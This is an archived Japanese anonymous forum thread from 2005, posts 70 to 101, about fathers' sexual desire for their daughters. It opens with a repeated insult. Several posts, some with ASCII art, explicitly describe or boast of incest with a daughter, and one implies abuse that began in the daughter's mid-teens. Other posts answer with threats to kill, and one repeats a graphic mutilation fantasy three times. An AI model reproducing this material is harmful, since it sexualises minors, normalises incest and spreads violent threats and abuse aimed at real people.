低能勘違い野郎は娘に捨てられて泣け
低能勘違い野郎は娘に捨てられて泣け
低能勘違い野郎は娘に捨てられて泣け
低能勘違い野郎は娘に捨てられて泣け
低能勘違い野郎は娘に捨てられて泣け
低能勘違い野郎は娘に捨てられて泣け
低能勘違い野郎は娘に捨てられて泣け
低能勘違い野郎は娘に捨てられて泣け
低能勘違い野郎は娘に捨てられて泣け
低能勘違い野郎は娘に捨てられて泣け
低能勘違い野郎は娘に捨てられて泣け
低能勘違い野郎は娘に捨てられて泣け
低能勘違い野郎は娘に捨てられて泣け
低能勘違い野郎は娘に捨てられて泣け
低能勘違い野郎は娘に捨てられて泣け
低能勘違い野郎は娘に捨てられて泣け
低能勘違い野郎は娘に捨てられて泣け
低能勘違い野郎は娘に捨てられて泣け
低能勘違い野郎は娘に捨てられて泣け
低能勘違い野郎は娘に捨てられて泣け
低能勘違い野郎は娘に捨てられて泣け
低能勘違い野郎は娘に捨てられて泣け
低能勘違い野郎は娘に捨てられて泣け
低能勘違い野郎は娘に捨てられて泣け
低能勘違い野郎は娘に捨てられて泣け
低能勘違い野郎は娘に捨てられて泣け
低能勘違い野郎は娘に捨てられて泣け
低能勘違い野郎は娘に捨てられて泣け
低能勘違い野郎は娘に捨てられて泣け
低能勘違い野郎は娘に捨てられて泣け
低能勘違い野郎は娘に捨てられて泣け
低能勘違い野郎は娘に捨てられて泣け
低能勘違い野郎は娘に捨てられて泣け
低能勘違い野郎は娘に捨てられて泣け
低能勘違い野郎は娘に捨てられて泣け




70 :名無しさん@お腹いっぱい。:2005/05/16(月) 13:00:44
娘に手を出したら私が殺してやるから楽しみにしときな。

71 :名無しさん@お腹いっぱい。:2005/05/16(月) 14:34:42
娘に性欲を感じるって、考えれないよ!
義理の母親ならまだしも・・・

72 :名無しさん@お腹いっぱい。:2005/05/16(月) 15:22:13
おまえらもう必死だなwww

73 :名無しさん@お腹いっぱい。:2005/05/16(月) 16:15:45
    ./            ;; ;;    :  l
    {           ミ゛ ミ     : l
   l            ./| ' \    : }
   l        ._,, . '/丿  .ヽ     {
   {     _,,,-''/ /. / ,,.   {     |
   ヽ  { .r'~  .i' i″   ,,,,-−、`i   { .}
    `、  !rニニコ、{,,, i !、,;;ニ三 ̄ , {  .{l  {     娘の濡れたマンコは俺のもんだ!!
      i  i  -=o=- .,  、 -=o=- ` リ`i.j'  ll
      .l ト,l   ''' ';   `゛゛   , ,. }   l
      {.{ .l    , '   ヽ、  : . ''|  ..{{
      `'. !   ./ 、,,_, ''゛ .\  ; ./;; .!川
         、  !  __,,,_,,,,..−、', ,' / l /ヽ_`
        ,.  ヽ.  'U''-二-'U  /./   l ; ヽ ""'''-=,,,
    _,,=-''''''" / ,'.ヽ、  U   ,,ン'.   /l ;  .i
 ,,=-''″    / ,' i::::.` ー一'''" ..   //;  ,' .!
''"       / ;  〈:::: ヽ ""      // .; ,'  l


74 :名無しさん@お腹いっぱい。:2005/05/16(月) 17:58:41
ぼくの夏休み。

75 :名無しさん@お腹いっぱい。:2005/05/16(月) 23:00:36
娘さん可哀想。既知外を父親に持って人生めちゃくちゃね。


76 :名無しさん@お腹いっぱい。:2005/05/16(月) 23:37:21
さりげなくスルーされてるが、40代で義理の母親に欲情って、母親何歳よ・・・

77 :名無しさん@お腹いっぱい。:2005/05/16(月) 23:44:26
76歳です。

78 :名無しさん@お腹いっぱい。:2005/05/16(月) 23:57:34
     ,.r<弌ヾヾヾヾヾヾ`ト`、-、__
    /-ニニヘヾヾヾヾヾヾヾヾヾヾ`ー-、
   ./ー二e `゙ `゙ ゙`ヾヾヾヾヾヾヾヾ、シナヘ
  仁一彡       ゙、ヾ、ヾヾ ゙ヘイ〃メ入
  f‐ニ=ツ ,.'   - 、  B       チ彡ニ┤
  !彡ニヽ   ` ー -- 二 _ー_--    三ニ-}
  V;〃ラ  /〃ニー        ̄   メ二ーヲ
  ハテj   ,. ニ、  、    、tヘヾi、 ヾミニソ
  .l. レ   < (・) > .;  .;:'  ,.= 、   lミ,‐ヲ
  ! l   、  ̄  ,! .i  < (・) >   レ' ノ
  l ト 、  ` '"´ ,!  l  、  ̄ ,   : ,j    どうして娘とオメコしてはいかんのだ?       
  `1゙ヽ      ,!  l   ` ´  ,.イ ,/     ワシは毎日の様に娘のオメコ汁をしゃぶっとる。
   l ';  ,.:' (´,、 ,. ヽヾ    ,.:' /`   
   .| ; ,:'   `   ´ ′ヽ  ,.' /       
     ! ; ,.'  _,,,_ __    ;  ;' /      
    ',  ゙、"ー-ニニニ=ヽ  ,.' /                  
    ヽヾ `ー--'''ー-一''′ /            
     `ヽ、    、 _ノ/        
        ` ー--一''''"´   娘のオメコはいいのう。ワシのちんぽに絡み付いてくるわい。
                   おおお、気持ちええ。娘はワシの女じゃ。近々婚姻届を出しに行こう。
                  わて、近親婚で指四本でんがな〜


79 :名無しさん@お腹いっぱい。:2005/05/17(火) 00:48:52
(#`ε´#)

80 :名無しさん@お腹いっぱい。:2005/05/17(火) 11:24:12
>>72

こんな既知外スレ野放しにして平気な奴らにくらべれば
必死で否定してる人の方がよっぽど素敵。

81 :名無しさん@お腹いっぱい。:2005/05/17(火) 11:38:52
おとうちゃん

おとうちゃんが大好きだから、
おとうちゃんが酔いつぶれて寝てる間に
私が愛しい愛しいおとうちゃんの両腕と両足を
ひじと膝の処から鉈でタタキ切り落としてあげる。

それからゆっくりおとうちゃんのチンコをのこぎりで切り取ってあげるね。
大丈夫。ちゃんと止血して死なないようにしてあげるから。
その素敵な両方の目の玉もほじくりだそうね。
他のおんなに見とれないように。

おとうちゃんはずっとわたしと一緒だよ?
大好きなおとうちゃん。

おとうちゃんは私のものだから絶対誰にも渡さない。
あははははははは

おとうちゃん

おとうちゃんが大好きだから、
おとうちゃんが酔いつぶれて寝てる間に
私が愛しい愛しいおとうちゃんの両腕と両足を
ひじと膝の処から鉈でタタキ切り落としてあげる。

それからゆっくりおとうちゃんのチンコをのこぎりで切り取ってあげるね。
大丈夫。ちゃんと止血して死なないようにしてあげるから。
その素敵な両方の目の玉もほじくりだそうね。
他のおんなに見とれないように。

おとうちゃんはずっとわたしと一緒だよ?
大好きなおとうちゃん。

おとうちゃんは私のものだから絶対誰にも渡さない。
あははははははは

おとうちゃん

おとうちゃんが大好きだから、
おとうちゃんが酔いつぶれて寝てる間に
私が愛しい愛しいおとうちゃんの両腕と両足を
ひじと膝の処から鉈でタタキ切り落としてあげる。

それからゆっくりおとうちゃんのチンコをのこぎりで切り取ってあげるね。
大丈夫。ちゃんと止血して死なないようにしてあげるから。
その素敵な両方の目の玉もほじくりだそうね。
他のおんなに見とれないように。

おとうちゃんはずっとわたしと一緒だよ?
大好きなおとうちゃん。

おとうちゃんは私のものだから絶対誰にも渡さない。
あははははははは


82 :名無しさん@お腹いっぱい。:2005/05/17(火) 20:04:58
あ〜ぁあ大次郎、まだ七つ

83 :娘大好き:2005/05/18(水) 01:41:57
娘と仲良くしたいだけなんだよ。
娘にはなんでもしてあげたい。
舌ったらずにほちい、って言われたら、プレステ3だって、徹夜で行列しちゃうぞ。
1週間くらいなら、よろこんで会社有給とるぞ。
愛してるんだ。

84 :名無しさん@お腹いっぱい。:2005/05/18(水) 01:43:38
>>83
きもいぞ!おっさん

85 :名無しさん@お腹いっぱい。:2005/05/18(水) 03:02:11
俺は娘のマンコが欲しいだけなんだよ。そこんとこをわかって欲しいな。

86 :名無しさん@お腹いっぱい。:2005/05/18(水) 11:12:42
↑娘として愛してるならそんな事を思う訳ねえよ。
そこんとこ分かって欲しいが、分かんねえだろうな、お前の頭じゃ。
お前基地外だぞ。マジ。

チンコ切られて当然だと思う。

87 :名無しさん@お腹いっぱい。:2005/05/18(水) 11:17:34
このスレ、男がどれだけバカかが証明されるね。
娘触ったらなぶり殺すから。マジ。
女をバカにするんじゃないよ。
切ったイチモツに蛆が湧くまで放っておこう。


88 :名無しさん@お腹いっぱい。:2005/05/18(水) 21:58:31
俺は妻と離婚して娘と二人暮しだったから、自然とオメコの関係になってしまった。
娘は今年成人式を迎えたが、俺とのオメコ歴は5年くらい。もう離れられない関係だ。
なぜならば、娘の感じる場所とか、オメコをどうしてやれば一番悦ぶか知り尽くしてるからだ。
娘も俺と結婚したがっている。俺とのオメコなしでは生きていけないと言っている。

89 :名無しさん@お腹いっぱい。:2005/05/18(水) 22:28:04
おまいらスレ違いやボケ
変態は別の板へ行け

90 :名無しさん@お腹いっぱい。:2005/05/18(水) 22:30:37
もう、ついていけねぇや〜

91 :名無しさん@お腹いっぱい。:2005/05/18(水) 22:30:54
誘導するなら最後まで。

92 :名無しさん@お腹いっぱい。:2005/05/18(水) 22:58:30
このスレ自体が変態じゃヴォケ。

お前、ロボトミー治療してもらえ。
お前の娘の為に。

93 :名無しさん@お腹いっぱい。:2005/05/18(水) 22:59:15
>>1



94 :名無しさん@お腹いっぱい。:2005/05/18(水) 23:02:16
いいねえ。

おとうちゃん、チンコ切らせてってほら
あんたの娘が言ってるよ?

良かったね。

こういう輩の血は他に受け継がれて欲しくないから
娘留りでよかったね。

95 :名無しさん@お腹いっぱい。:2005/05/18(水) 23:03:28
他にどんな血がイヤなんだい。

96 :名無しさん@お腹いっぱい。:2005/05/18(水) 23:10:47
繁殖してもらっちゃ困るモンね。
同じ血が混ざればどんどん知能が下がって
奇形度が進んで
いつかそういう奴等だけで住める島に島流しになるのがイイ。
勝手に破滅して欲しい。

97 :名無しさん@お腹いっぱい。:2005/05/18(水) 23:12:24
勝手すぎる

98 :名無しさん@お腹いっぱい。:2005/05/18(水) 23:13:28
他人は必要なのだよ。

99 :名無しさん@お腹いっぱい。:2005/05/18(水) 23:54:04
俺は娘に俺の子を産ませたいと思っている。血は永遠に引き継がれる。

100 :名無しさん@お腹いっぱい。:2005/05/18(水) 23:55:29
つぎで終り。

101 :停止しました。。。:停止
真・スレッドストッパー。。。( ̄ー ̄)ニヤリッ

40 KB
■ このスレッドは過去ログ倉庫に格納されています

★スマホ版★ 掲示板に戻る 全部 前100 次100 最新50

read.cgi ver 05.02.02 2014/06/23 Mango Mangüé ★
FOX ★ DSO(Dynamic Shared Object)